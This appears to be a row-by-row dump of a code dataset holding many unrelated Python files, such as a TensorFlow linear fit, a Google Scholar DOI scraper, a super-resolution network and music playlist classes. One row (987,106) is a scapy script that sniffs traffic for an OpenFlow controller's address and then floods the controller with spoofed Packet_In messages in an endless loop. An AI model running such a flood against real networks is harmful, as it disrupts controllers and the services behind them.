index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
987,100 | 358875bfef0a67e96076967b9f0be6493760c68e | # -*- encoding: utf-8 -*-
import os
import sys,glob
#prefix = sys.prefix
#scriptdir = os.path.join(prefix,'Scripts')
#easy_inst = os.path.join(scriptdir, 'easy_install.exe')
#if not os.access(easy_inst,os.F_OK):
# print u'请安装easy_install工具'
# sys.exit(1)
easy_inst = 'ez_setup.py'
pkgs = [
['Numeric','Numeric','Numeric'],
['PIL','PIL','Image'],
['wxPython','wxPython','wx'],
['django','django','django'],
['ctypes','ctypes','ctypes'],
['PyOpenGL','PyOpenGL','OpenGL.GL'],
['pysqlite2','pysqlite','pysqlite2'],
]
def instpkg(name,instname,importname):
try:
print u'检查'+name+u'是否安装...',
exec('import '+importname)
print u'\r已安装'+name+u',忽略...'
except:
print u'\r未安装。正在安装'+name+'...'
if name == 'wxPython':
wxpy = glob.glob('wxPython*.exe')
if len(wxpy):
os.system(wxpy[len(wxpy)-1])
else:
print u"安装wxPython没有成功,您可能需要手动安装"
elif name == 'django':
pwd = os.getcwd()
djangopath = glob.glob('Django*')
for i in djangopath:
if os.path.isdir(i):
os.chdir(i)
os.system("setup.py install")
os.chdir(pwd)
break
else:
os.system(easy_inst+' -f ./ '+instname)
for pkg in pkgs:
instpkg(pkg[0],pkg[1],pkg[2])
|
987,101 | ac4aaf778d0ea9cfac29dbc2048e81f0f0bf22df | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 25 17:30:37 2018
@author: K.Ataman
"""
"""
Find linear relation of the kind y = Ax + B + G(n) where G(n) is Additive White
Gaussian Noise
"""
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
num_points = 500
x_point = []
y_point = []
a = 0.22
b = 0.78
"""generate random data"""
for i in range(num_points):
x = np.random.normal(0.0,0.5)
# y= ax+b with some additional noise
y = a*x + b +np.random.normal(0.0,0.1)
x_point.append([x])
y_point.append([y])
#A represents our estimation of A , with uniform initialization
A = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
B = tf.Variable(tf.zeros([1]))
y = A * x_point + B
#mean square error is defined as cost
cost_function = tf.reduce_mean(tf.square(y - y_point))
#optimize cost using gradient descent
optimizer = tf.train.GradientDescentOptimizer(0.5)
train = optimizer.minimize(cost_function)
model = tf.global_variables_initializer()
with tf.Session() as session:
session.run(model)
for step in range(0,21):
#train (includes data feeding)
session.run(train)
#plot results
if (step % 5) == 0:
plt.plot(x_point,y_point,'o',
label='step = {}'
.format(step))
plt.plot(x_point,
session.run(A) *
x_point +
session.run(B))
plt.legend()
plt.show() |
987,102 | 88d9fc64dc6bf18fe9771bc3432d7a61342dade6 | #오른쪽 아래가 직각인 이등변 삼각형으로 *출력
print('오른쪽 아래가 직각인 이등변 삼각형으로 *출력')
n= int(input('짧은 변의 길이를 입력:'))
for i in range(n):
for _ in range(n-i-1):
print(' ', end='')
for _ in range(i+1):
print('*',end='')
print() |
987,103 | 537621c77b3841ff91d0c9ba7083bc183cf06fa9 | import logging
def main(name: str) -> str:
return f"Hello {name}!"
|
987,104 | 1d2e2eb2c10108687a1dc49559484804e918c456 | from cmsplugin_rst.models import RstPluginModel
from django import forms
help_text = '<a href="http://docutils.sourceforge.net/docs/ref/rst/restructuredtext.html">Reference</a>'
class RstPluginForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea(attrs={
'rows':30,
'cols':80,
'style':'font-family:monospace'
}),
help_text=help_text
)
class Meta:
model = RstPluginModel |
987,105 | 9970c3bf7333c375f087dd2567bed4a8dfba450e | import re
import sys
import time
import random
from BeautifulSoup import BeautifulSoup
import requests
UA = 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9'
def parse_soup_page(soup):
"""
:param soup: object obtained from page of Google Scholar cites
eg.: http://scholar.google.com/scholar?oi=bibs&hl=en&cites=108642523785399070
:return: links containing identifiers of citations (eg. DOI)
"""
links = list()
for div in soup.findAll('div'):
if div.name == "div" and div.get('class') == "gs_ri":
link = div.a['href']
parsed_link = parse_link(link)
if parsed_link == "no-match":
print("Couldn't parse link:\t{0}".format(link))
else:
print("DOI:\t{0}".format(parsed_link))
links.append(parsed_link)
return links
def parse_link(link):
"""
:param link: string URL or paper link begining with http://
:return: DOI or other identifier. eg. doi: 10.10....
other: http://xxxyyyyzzz
"""
pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
matches = re.search(pattern, link, re.UNICODE)
if matches:
doi = matches.groups()[0].strip()
doi = re.sub("\/full$", "", doi)
doi = re.sub("\/abstract$", "", doi)
doi = re.sub("\/summary$", "", doi)
if doi:
return doi
# it might be from biomedcentral
pattern = "www\.biomedcentral\.com"
matches = re.search(pattern, link, re.UNICODE)
if matches:
doi = parse_biomedcentral(link)
if doi:
return doi
# it might be from Zootaxa, not dois before 2013
pattern = "www\.mapress\.com\/zootaxa"
matches = re.search(pattern, link, re.UNICODE)
if matches:
doi = link
if doi:
return doi
# it might be from sciencedirect
pattern = "www\.sciencedirect\.com"
matches = re.search(pattern, link, re.UNICODE)
if matches:
doi = parse_sciencedirect(link)
if doi:
return doi
# it might be from royal society rspb
pattern = "rspb\.royalsocietypublishing\.org"
matches = re.search(pattern, link, re.UNICODE)
if matches:
doi = parse_rspb(link)
if doi:
return doi
# it might be a PDF link from springerlink
pattern = "springerlink\.com\/.+pdf$"
matches = re.search(pattern, link, re.UNICODE)
if matches:
doi = parse_springerlink_pdf(link)
if doi:
return doi
# it might be from Scielo but not a link to PDF file
pattern = "www\.scielo\..+[^pdf]$"
matches = re.search(pattern, link, re.UNICODE)
if matches:
doi = parse_scielo(link)
if doi:
return doi
# it might be a handle
pattern = "\/handle\/(\d+\/\d+)"
matches = re.search(pattern, link, re.UNICODE)
if matches:
doi = "http://hdl.handle.net/" + matches.groups()[0]
return doi
# it might be a sysbio.oxfordjournals.org early pub link
pattern = "sysbio.oxfordjournals.org\/.+\/early\/.+\/sysbio\.(.+)\.short"
matches = re.search(pattern, link, re.UNICODE)
if matches:
doi = "10.1093/sysbio/" + matches.groups()[0]
return doi
# couldn't find a match
return "no-match"
def parse_scielo(link):
"""
:param link: string URL from springerlink ending with "pdf"
:return: DOI or other identifier. eg. doi: 10.10....
"""
req = requests.get(link, headers={'User-Agent': UA})
html_doc = req.text
soup = BeautifulSoup(html_doc)
try:
doi = soup.find('h4', attrs={'id': 'doi'}).contents[0]
except:
doi = ""
pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
matches = re.search(pattern, doi, re.UNICODE)
if matches:
doi = matches.groups()[0].strip()
return doi
def parse_springerlink_pdf(link):
"""
:param link: string URL from springerlink ending with "pdf"
:return: DOI or other identifier. eg. doi: 10.10....
"""
req = requests.get(link, headers={'User-Agent': UA})
html_doc = req.text
soup = BeautifulSoup(html_doc)
for meta in soup.findAll("meta"):
if meta.get('name') == "citation_doi":
doi = meta.get('content')
pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
matches = re.search(pattern, doi, re.UNICODE)
if matches:
doi = matches.groups()[0].strip()
return doi
def parse_biomedcentral(link):
"""
:param link: string URL from biomedcentral with http://
:return: DOI or other identifier. eg. doi: 10.10....
"""
if "pdf" in link:
# http://www.biomedcentral.com/content/pdf/1471-2148-12-82.pdf
# http://www.biomedcentral.com/1471-2148/12/82
link = re.sub("content\/pdf\/", "", link)
link = re.sub("\.pdf$", "", link)
link = re.sub("-(\d+)-(\d+)$", "/\\1/\\2", link)
req = requests.get(link, headers={'User-Agent': UA})
html_doc = req.text
soup = BeautifulSoup(html_doc)
for meta in soup.findAll("meta"):
if meta.get('name') == "citation_doi":
doi = meta.get('content')
pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
matches = re.search(pattern, doi, re.UNICODE)
if matches:
doi = matches.groups()[0].strip()
return doi
def parse_sciencedirect(link):
"""
:param link: string URL from sciencedirect with http://
:return: DOI or other identifier. eg. doi: 10.10....
"""
if "pdf" not in link:
req = requests.get(url=link, headers={'User-Agent': UA})
html_doc = req.text
soup = BeautifulSoup(html_doc)
tag = soup.find('a', attrs={'id': 'ddDoi'})
try:
doi_link = tag.get("href")
except:
doi_link = ""
pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
matches = re.search(pattern, doi_link, re.UNICODE)
if matches:
doi = matches.groups()[0].strip()
return doi
def parse_rspb(link):
"""
:param link: string URL from royal society rspb with http://
:return: DOI or other identifier. eg. doi: 10.10....
"""
if "pdf" not in link:
req = requests.get(link, headers={'User-Agent': UA})
html_doc = req.text
soup = BeautifulSoup(html_doc)
for meta in soup.findAll("meta"):
if meta.get('name') == "DC.Identifier":
doi = meta.get('content')
pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
matches = re.search(pattern, doi, re.UNICODE)
if matches:
doi = matches.groups()[0].strip()
return doi
def get_total_hits(soup):
results = soup.find('div', attrs={'id': 'gs_ab_md'}).contents[0]
matches = re.search("About\s(\d+)\s", results)
if matches:
hits = matches.groups()[0]
return hits
def get_citing_dois(cites_url):
"""
:param cites_url: a citation url from GoogleScholar
:return: a list of DOIs extracted from URLs by following the links
"""
n = random.random() * 5
time.sleep(n)
print("Sleeping: {0} seconds".format(n))
# GS seems to allow only 20 hits per page!
cites_url += "&num=20"
req = requests.get(cites_url, headers={'User-Agent': UA})
html_doc = req.text
soup = BeautifulSoup(html_doc)
hits = get_total_hits(soup)
print("Got a total of {0} hits".format(hits))
if hits:
hits = int(hits)
index = 0
dois = []
while hits > 1:
n = random.random()*2
time.sleep(n)
if index > 0:
url = cites_url + "&start=" + str(index)
else:
url = cites_url
index += 20
hits -= 20
req = requests.get(url, headers={'User-Agent': UA})
html_doc = req.text
soup = BeautifulSoup(html_doc)
links = parse_soup_page(soup)
for i in links:
dois.append(i)
return dois
else:
# just do 20 records
req = requests.get(cites_url, headers={'User-Agent': UA})
html_doc = req.text
soup = BeautifulSoup(html_doc)
return parse_soup_page(soup)
def main():
random.seed()
if len(sys.argv) < 2:
print("Enter as argument a google scholar citation link")
print("Example: http://scholar.google.com/scholar?oi=bibs&hl=en&cites=108642523785399070")
sys.exit(1)
cites_url = sys.argv[1].strip()
get_citing_dois(cites_url)
if __name__ == "__main__":
main()
|
987,106 | 5d30b345b27c1a5a00453c5983113dff52dff694 | import subprocess as sub
import scapy
from scapy.all import *
from scapy.contrib import openflow as op
src_ip = "192.168.0.2"
interface = "eth0"
ctrl_ip="192.168.0.3"
ctrl_port=6653
def ctrl_data():
data=[]
capture = sub.Popen(('sudo', 'tcpdump', '-ni', 'eth0', 'tcp', 'port', '6653', '-w', 'capture.pcap','-c','20'), stdout=sub.PIPE)
for row in iter(capture.stdout.readline, b''):
print (row.rstrip())
cap=rdpcap('capture.pcap')
#i=0
for caps in cap:
try:
if (caps[3].type == 5) and not data:
print('enter')
ctrl_ip = caps[1].src
ctrl_port = caps["IP"].sport
print('\nController IP:' +ctrl_ip)
data.append(ctrl_ip)
print('Controller port:' )
print(ctrl_port)
print('\n')
data.append(ctrl_port)
except:
pass
if not data:
msg = 'It did not enter the if loop'
data.append(msg)
return data
def attack(ctrl_ip, ctrl_port):
i=0
while True:
packetin = Ether(src="02:42:c0:a8:00:02", dst="02:42:c0:a8:00:03")/IP(dst= ctrl_ip, src= src_ip)/op.TCP(sport= 46688 , dport= ctrl_port, seq=i)/op.OFPTPacketIn()
i=i+1
# packetin.show()
sendp(packetin, iface = interface)
print('Sending Packet_In to controller')
|
987,107 | 3a52c3b5c14fe06e3dd837c028b17e2bf4ec0347 | test = {
'name': 'q6',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> isinstance(answer6, list)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> all([isinstance(elt, str) for elt in answer6])
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> all([elt in calls['CVLEGEND'].values for elt in answer6])
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> set(answer6) == set(['LARCENY', 'BURGLARY - VEHICLE', 'VANDALISM', 'DISORDERLY CONDUCT', 'ASSAULT'])
True
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
|
987,108 | aa28c629c91f6627f101653b1d9428f077bda1aa | """
Coded by Matthew Nebel for the CogWorks IFF experiment
The Picture class is used to easily store information about and manipulate the art assets of the experiment.
Variables:
image - stores the picture itself, scaled by the given number
loc - a tuple storing the x and y coordinate of the image
Functions:
init - takes the filename of an image on the computer, a tuple containing the x and y coordinates of
where the image should be drawn on the screen, and a float value to scale the image by.
shade - takes a tuple of RGB values between 0 and 1 to shade the entire image with
"""
import pygame, sys, math, numpy
from pygame.locals import *
class Picture:
def __init__(self, filename, location, scale):
self.image = pygame.image.load("looming_art/"+filename).convert_alpha()
self.image = pygame.transform.smoothscale(self.image, (int(self.image.get_width()*scale), int(self.image.get_height()*scale)))
self.loc = location
def shade(self, color):
copy1 = self.image.copy()
copy2 = self.image.copy()
alphaCopy = pygame.surfarray.array_alpha(copy1)
alphaRef = pygame.surfarray.pixels_alpha(copy1)
RGBarray = pygame.surfarray.pixels3d(copy2)
RGBarray[:,:,0] *= color[0]/255.0
RGBarray[:,:,1] *= color[1]/255.0
RGBarray[:,:,2] *= color[2]/255.0
pygame.surfarray.blit_array(copy1, RGBarray)
alphaRef[:] = alphaCopy
return copy1 |
987,109 | 77bcf3cd5a8aabd489e18e17635e7a8bd56af23b | import unittest
import sys
sys.path.append('../')
from Methods.CreateCategory import Category
class TestCategory(unittest.TestCase):
"""
Purpose: Test Category
Author: Zach
Tests:
test_can_create_a_category
test_can_register_category_to_database
"""
@classmethod
def setUpClass(self):
self.food = Category(
category_name = "Food")
def test_can_create_a_category(self):
# Test is food a type of Category
self.assertIsInstance(self.food, Category)
def test_can_register_category_to_database(self):
# Test if Food can be added to the database
# Test if Food is in the Database
self.food.save_category(self.food)
self.assertTrue(Category.category_is_registered(self.food))
# run unittest
if __name__ == "__main__":
unittest.main() |
987,110 | 9fa77ff3028f6e8db040c0681f7827732c1df226 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 24 19:22:41 2018
@author: labuser
"""
# Load and display limit scans from 2018-09-24
import os
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import cauchy
from scipy.optimize import curve_fit
import pandas as pd
def limit_scan(fname):
data = pd.read_csv(fname, sep='\t', comment="#", index_col=False)
data['sig'] = data['s'] - data['sb']
data.sort_values(by='f', inplace=True)
data.plot(x='f', y='sig')
return
def cauchy_model(x, a, loc, scale, y0):
return a*cauchy.pdf(x, loc, scale) + y0
def cauchy_fit(x, y):
p0 = [(max(y) - min(y))*(max(x) - min(x))/10,
x[np.argmax(y)],
(max(x) - min(x))/10, min(y)]
popt, pcov = curve_fit(cauchy_model, x, y, p0)
print("Center Frequency is : ", popt[1]*1e-6, " GHz")
return popt
def mw_fscan(fname):
data = pd.read_csv(fname, sep="\t", comment="#", index_col=False,
header=None, names=['f', 's'])
data.sort_values(by='f', inplace=True)
popt = cauchy_fit(data['f'].values, data['s'].values)
# print(popt)
ax = data.plot(x='f', y='s')
ax.plot(data['f'].values, cauchy_model(data['f'].values, *popt))
return
if __name__ == "__main__":
# fname = "1_lim_dye.txt"
fname = "2_fscan.txt"
folder = os.path.join("..", "2018-09-24")
fname = os.path.join(folder, fname)
# limit_scan(fname)
mw_fscan(fname) |
987,111 | f6368ca316c791e62355da544ca662b2d92f1da3 | import xlrd
book3 = xlrd.open_workbook("book3.xlsx")
poi = xlrd.open_workbook("POI_CityGuide_global_final_07_10.xlsx")
sheetBook3 = book3.sheet_by_index(0)
sheetPoi = poi.sheet_by_index(0)
poicountry = [x.strip().lower() for x in sheetPoi.col_values(16)]##set= to elminate duplicates
poicity = [x.strip().lower() for x in sheetPoi.col_values(17)]
poidic={}
for city, country in zip (poicity, poicountry):
if city not in poidic:
poidic[city] = country
poicountry = [x.lower() for x in poicountry]##x.lower to lower down alphabets
l = [x.strip() for x in sheetPoi.col_values(17)]
c=[]
for x, city in enumerate(l):
try:
print (x, city)
c.append(city)
except:
pass
#print(x)
poicity = list(set(c))
poicity = [x.lower() for x in poicity]
Bookcity =list(set( sheetBook3.col_values(2)))
Bookcity = [x.lower() for x in Bookcity]
difference=(list(set(poicity) - set(Bookcity)))
print ("differences ------------")
for x in difference:
print(poidic[x] + "--" + x)
print (len(difference))
|
987,112 | 94fa819e207fd8bc902fb5cc2ae883e2349ef4b4 | nums = int(input())
res = []
for i in range(nums):
length = int(input())
list1 = input().split(" ")
list1 = [int(i) for i in list1]
list1.sort()
k = 0
while k < len(list1) - 1:
if list1[k] == list1[k + 1]:
res.append(k + 1)
break
k += 1
else:
res.append(-1)
for i in res:
print(i) |
987,113 | db3f66f602b48b6ac3d3d2ea973f4d8aaad9a4a0 | 직사각형별찍기.py
a, b = map(int, input().strip().split(' '))
for x in range(b): #세로
for y in range(a): #가로
print('*', end='')
print()
|
987,114 | 5faf2895d553068f4911ee002b33c1c1b249cbeb | import h5py as h5
import pandas as pd
name = "mnist_nn_64.h5"
f = h5.File(name)
for layer in f['model_weights']:
pd.DataFrame(f['model_weights'][layer][layer]['kernel:0']).to_csv(f"mnist_{layer}_kernel_array.csv", index=False, header=False, sep='\n')
pd.DataFrame(f['model_weights'][layer][layer]['bias:0']).to_csv(f"mnist_{layer}_bias_array.csv", index=False, header=False)
|
987,115 | cc73d0e021065d7be90598378cf98fc16a48770d | import torch
import torch.nn as nn
import math
'''
This is PyTorch implementation of BSRN('Lightweight and Efficient Image Super-Resolutionwith Block
State-based Recursive Network'). The original code is based on TensorFlow and the github is
'https://github.com/idearibosome/tf-bsrn-sr'
'''
def make_model(args, parent=False):
return BSRN(args)
class MeanShift(nn.Conv2d):
def __init__(self, rgb_mean, rgb_std, sign=-1):
super(MeanShift, self).__init__(3, 3, kernel_size=1)
std = torch.Tensor(rgb_std)
self.weight.data = torch.eye(3).view(3, 3, 1, 1)
self.weight.data.div_(std.view(3, 1, 1, 1))
self.bias.data = sign * 255. * torch.Tensor(rgb_mean)
self.bias.data.div_(std)
self.requires_grad = False
class Upsampler(nn.Sequential):
def __init__(self, scale, n_feats, act):
m = []
if (scale & (scale - 1)) == 0:
for _ in range(int(math.log(scale, 2))):
m.append(nn.Conv2d(n_feats, 4 * n_feats, 3, padding=1))
m.append(nn.PixelShuffle(2))
if act: m.append(nn.ReLU(True))
elif scale == 3:
m.append(nn.Conv2d(n_feats, 9 * n_feats, 3, padding=1))
m.append(nn.PixelShuffle(3))
if act is not None: m.append(act)
else:
raise NotImplementedError
super(Upsampler, self).__init__(*m)
class Residual_block(nn.Module):
def __init__(self, n_feats, kernel_size, act):
super(Residual_block, self).__init__()
self.conv1 = nn.Conv2d(n_feats * 2, n_feats * 2, kernel_size, 1, kernel_size // 2)
self.conv2 = nn.Conv2d(n_feats * 2, n_feats * 2, kernel_size, 1, kernel_size // 2)
self.conv3 = nn.Conv2d(n_feats * 2, n_feats * 2, kernel_size, 1, kernel_size // 2)
self.act = act
def forward(self, x, state):
concat = torch.cat([x, state], 1)
res = self.conv1(concat)
res = self.conv2(self.act(res))
res, state = torch.split(res, (64, 64), dim = 1)
res = res + x
state = self.conv3(torch.cat([res, state], dim=1))
res2, state = torch.split(state, (64, 64), dim=1)
return res + res2, state
# recursive residual block (n_recursions = 15)
class RRB(nn.Module):
def __init__(self, n_recursions, n_feats, kernel_size, act):
super(RRB, self).__init__()
self.n_recursions = n_recursions
self.block = Residual_block(n_feats, kernel_size, act)
def forward(self, x):
# state = torch.zeros(x.shape).cuda() # 第一个state初始化为0,并且gpu加速
state = torch.zeros(x.shape) # 第一个state初始化为0,并且gpu加速
for i in range(self.n_recursions):
x, state = self.block(x, state)
return x
class BSRN(nn.Module):
def __init__(self):
super(BSRN, self).__init__()
n_recursions = 15
n_colors = 3
n_feats = 64
kernel_size = 3
scale = 4
act = nn.ReLU(True)
# RGB mean for DIV2K
rgb_mean = (0.4488, 0.4371, 0.4040)
rgb_std = (1.0, 1.0, 1.0)
self.sub_mean = MeanShift(rgb_mean, rgb_std)
self.add_mean = MeanShift(rgb_mean, rgb_std, 1)
# feature shallow extraction layer
self.head = nn.Conv2d(n_colors, n_feats, kernel_size, padding=kernel_size // 2)
# middle feature extraction layer
self.body = RRB(n_recursions, n_feats, kernel_size, act)
# upsample and reconstruction layer
self.tail = nn.Sequential(*[
Upsampler(scale, n_feats, act=None),
nn.Conv2d(n_feats, n_colors, kernel_size=3, padding=kernel_size // 2)
])
def forward(self, x):
x = self.sub_mean(x)
x = self.head(x)
x = self.body(x)
x = self.tail(x)
x = self.add_mean(x)
return x
from torchstat import stat
net = BSRN()
stat(net, (3, 10, 10)) |
987,116 | 636d8bb7917e780f105f12a5a05c71fd411218b3 | import gspread
import mlbgame
import calendar
import time
from oauth2client.service_account import ServiceAccountCredentials
def initMonth(month,numDays):
# use creds to create a client to interact with the Google Drive API
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
name = calendar.month_name[month]
# Find a workbook by name and open the first sheet
# Make sure you use the right name here.
wb = client.open('BettingSim')
for i in range(1,numDays+1):
fullName = name+""+str(i)
wb.add_worksheet(fullName,50,10)
def clearMonth(month,numDays):
# use creds to create a client to interact with the Google Drive API
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
name = calendar.month_name[month]
# Find a workbook by name and open the first sheet
# Make sure you use the right name here.
wb = client.open('BettingSim')
for i in range(1,numDays+1):
fullName = name+""+str(i)
wb.del_worksheet(wb.worksheet(fullName))
def addGames(month,numDays):
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
name = calendar.month_name[month]
wb = client.open('BettingSim')
for i in range(1,numDays+1):
fullName = name+""+str(i)
sheet = wb.worksheet(fullName)
sheet.append_row(['Home','Away','Game_ID','Wager','Line','Result'])
games = mlbgame.day(2019, month, i)
for game in games:
sheet.append_row([game.home_team, game.away_team, game.game_id])
time.sleep(1)
def evalGames(month,numDays):
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
name = calendar.month_name[month]
wb = client.open('BettingSim')
for i in range(1, numDays + 1):
fullName = name + "" + str(i)
sheet = wb.worksheet(fullName)
list_of_hashes = sheet.get_all_records()
for row in list_of_hashes:
evalGame(row['Game_ID'],sheet)
def evalGame(game_id,sheet):
try:
innings = mlbgame.box_score(game_id).innings
if not innings:
print('debug stmt')
if innings[0]['home']+innings[0]['away'] is 0:
id_cell = sheet.find(game_id)
sheet.update_cell(id_cell.row+3,id_cell.col+3,'win')
time.sleep(1)
except:
print("innings issues")
clearMonth(4,30)
initMonth(4,30)
addGames(4,30)
evalGames(4,30) |
987,117 | 3ed185a8180c764f085215df61c4010c356d5f7c | #!/usr/bin/env python
from pathlib import Path
from subprocess import run
root = Path(__file__).parent.resolve()
if __name__ == '__main__':
for recipe in (root / 'recipes').glob('*'):
for py_ver in ['2.7', '3.5', '3.6', '3.7']:
run(['python', 'build.py', str(recipe), py_ver], cwd=root,
check=True)
|
987,118 | d7c872be1c02d8c7620503c4ab284f7e9f6d2e56 | # author: hmin
# contact: hmin@zju.edu.cn
# datetime: 2019/10/3 22:31
# software: PyCharm 2017.1.2-Python 3.6.0(Anaconda)
# -*-coding:utf-8-*-
"""
文件说明
判断列表是否含有重复元素
"""
def has_duplicates(lst):
"""
方法用于判断列表是否含有重复元素,是返回True,否返回False
"""
return len(lst) != len(set(lst)) |
987,119 | a70d0b2be64d80ebe7c1e1d7533e1944ea08a879 | import os
from random import randint
from tabulate import tabulate
import json
from mutagen.mp3 import MP3
import mutagen
class Song:
def __init__(self, title="Odin", artist="Manowar", album="The Sons of Odin", length="3:44"):
self.title = title
self.artist = artist
self.album = album
self.length = length
self.legth_in_secs = self.legth_in_secs()
def legth_in_secs(self):
total = 0
total += 100 # int(self.length[:2])*60*60 #add secs
total += 10 # int(self.length[-5:-3])*60 #add mins
total += 1 # int(self.length[:2]) #add hours
return total
def __str__(self):
return "{0} - {1} from {2} - {3}".format(self.artist, self.title, self.album, self.length)
def __eq__(self, other):
if self.title == other.title and self.artist == other.artists:
return True
else:
return False
def __hash__(self):
return 123
def lengths(self, minutes=False, seconds=False, hours=False):
total_length = 0
if hours:
return self.length[:2]
elif minutes:
return self.length[-5:-3]
elif seconds:
return self.length[-2:]
class Playlist:
def __init__(self, name="Code", repeat=False, shuffle=False):
self.name = name
self.repeat = repeat
self.shuffle = shuffle
self.content = []
self.current_song = None
def add_song(self, song):
self.content.append(song)
# self.content[song.title] = [song.artist, song.album, song.length]
def remove_song(self, song):
self.content.remove(song)
def add_songs(self, songs):
for item in songs:
self.add_song(item)
def total_length(self):
total_l = 0
for item in self.content:
total_l += item.legth_in_secs
return total_l
def artists(self):
artist = {}
for item in self.content:
if item in artist:
artist[item] += 1
else:
artist[item] = 1
for item in artist:
print(item.artist),
print(artist[item])
def curren_song(self):
if self.current_song == None:
current_song = input("select a number in our playlist - > ")
self.current_song = int(current_song)
return self.current_song
def next_song(self):
current_song = self.curren_song()
# self.current_song = self.curren_song()
# print(self.current_song)
remaining_songs = self.content[self.current_song + 1:]
if current_song == len(self.content) - 1 and self.repeat == False:
return "no next song"
if self.repeat is False and self.shuffle is False:
self.current_song = current_song + 1
return self.content[current_song + 1]
if current_song == len(self.content) - 1 and self.repeat == True and self.shuffle == False:
self.current_song = 0
return self.content[0]
if self.repeat is True and self.shuffle is True:
self.current_song = randint(0, len(self.content))
return self.content[self.current_song]
if self.repeat is True and self.shuffle is False:
# if self.current_song < len(self.content)-1:
pass
if self.repeat is False and self.shuffle is True:
rand_selection = randint(0, len(remaining_songs) - 1)
self.current_song = rand_selection
return self.content[rand_selection]
def print_content(self):
for i in range(0, len(self.content)):
print (self.content[i])
def pprint_playlist(self):
table = []
for i in range(0, (len(self.content))):
table.append(
[self.content[i].artist, self.content[i].title, self.content[i].length])
headers = ['Artist', 'Title', 'Length of song']
print(tabulate(table, headers, tablefmt='orgtbl'))
def save(self):
d = {}
if ' ' in self.name:
self.name = self.name.replace(" ", "-")
d[self.name] = []
for i in range(0, len(self.content)):
d[self.name].append(str(self.content[i]))
f = open("playlist_output.json", "w")
json.dump(d, f)
print(d)
@staticmethod
def load():
f = open("playlist_input.json", "r")
data = json.load(f)
for k, v in data.items():
playlist_name = k
playlist_songs = v
playlist = Playlist(name=playlist_name)
# print(playlist_songs)
class MusicCrawler:
def __init__(self, path):
self.path = path
def get_info(self, data):
song_data = {}
try:
song_data["artist"] = data["TPE1"].text[0]
except:
song_data["artist"] = "Unknown Artist"
try:
song_data["album"] = data["TALB"].text[0]
except:
song_data["album"] = "Unknown Album"
try:
song_data["title"] = data["TIT2"].text[0]
except:
song_data["title"] = "Unknown Title"
try:
song_data["length"] = str(
datetime.timedelta(seconds=data.info.length // 1))[2:]
except:
song_data["length"] = "Unknown"
return song_data
def generate_playlist(self):
play_list = Playlist()
tracks = [mp3 for mp3 in os.listdir(self.path) if mp3.endswith(".mp3")]
for track in tracks:
data = mutagen.File(self.path + "/" + track)
info = self.get_info(data)
new_song = Song(artist=info["artist"], title=info[
"title"], album=info["album"], length=info["length"])
play_list.add_song(new_song)
return play_list
some_song = Song(length="22:32:44")
other_song = Song(
title='tttttitle', album='allBUM', artist='Man', length="01:32:32")
print(other_song.legth_in_secs)
li = [some_song, other_song]
some_playlist = Playlist(name='s wmw t')
print(some_song.legth_in_secs)
# some_playlist.add_song(some_song)
print(some_playlist.content)
# some_playlist.remove_song(some_song)
some_playlist.add_songs(li)
# print(some_playlist.content)
print(some_playlist.total_length())
# print(some_playlist.current_song())
# print(some_playlist.next_song())
print(some_playlist.pprint_playlist())
Playlist.load()
crawler = MusicCrawler("/home/mihail/Music/CD1")
print(crawler.generate_playlist().name)
|
987,120 | 58b9780ad70e7d19ece6ff483b0c98e3d9521394 | # escreva um program que leia dois numeros inteiro
#e compare os mostrando na tela uma mensagem
# o primeiro valor e maior
#o segundo valor e maior
# nao existe valor maior os dois sao iguais
n1 = int(input('digiter um numero: '))
n2 = int(input('digite outro numero: '))
if n1 > n2:
print('o maio valor é ', n1)
elif n2 > n1:
print('o maior valor é ', n2)
else:
print('os valores sao iguais')
|
987,121 | 55ad8b02d64a7ae53b720275f1fa9879606ca263 | from steemapi.steemwalletrpc import SteemWalletRPC
from pprint import pprint
import time
def dumpkeys(account, typ):
name = account["name"]
keys = account[typ]["key_auths"]
for key in keys:
try:
wif = rpc.get_private_key(key[0])
print("%10s: %10s: %s %s" % (
name, typ, key[0], wif))
except:
pass
rpc = SteemWalletRPC("localhost", 8092, "", "")
accounts = rpc.list_my_accounts()
assert rpc.is_locked, "Wallet is locked"
for account in accounts:
dumpkeys(account, "active")
dumpkeys(account, "owner")
dumpkeys(account, "posting")
|
987,122 | f70867c4886983852966d2ad6814ba66f034e44e | # Communication with mongo
from pymongo import MongoClient
# Retreive congiguration info
import ConfigParser
# Reading the config file
config = ConfigParser.RawConfigParser()
config.read('read.cfg')
# Reading database settings
client = MongoClient()
db = client[config.get('mongodb', 'db')]
